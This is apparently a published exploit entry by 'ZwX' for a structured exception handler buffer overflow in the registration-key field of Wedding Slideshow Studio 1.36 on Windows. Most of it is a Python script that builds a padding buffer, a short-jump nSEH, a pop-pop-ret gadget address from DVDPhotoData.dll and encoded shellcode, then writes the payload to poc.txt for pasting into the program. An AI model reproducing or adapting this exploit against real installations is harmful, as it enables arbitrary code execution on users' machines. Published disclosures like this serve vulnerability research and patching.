"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"

Author: ZwX

Platform: windows

Release date: 2020-02-10

#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a)
#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"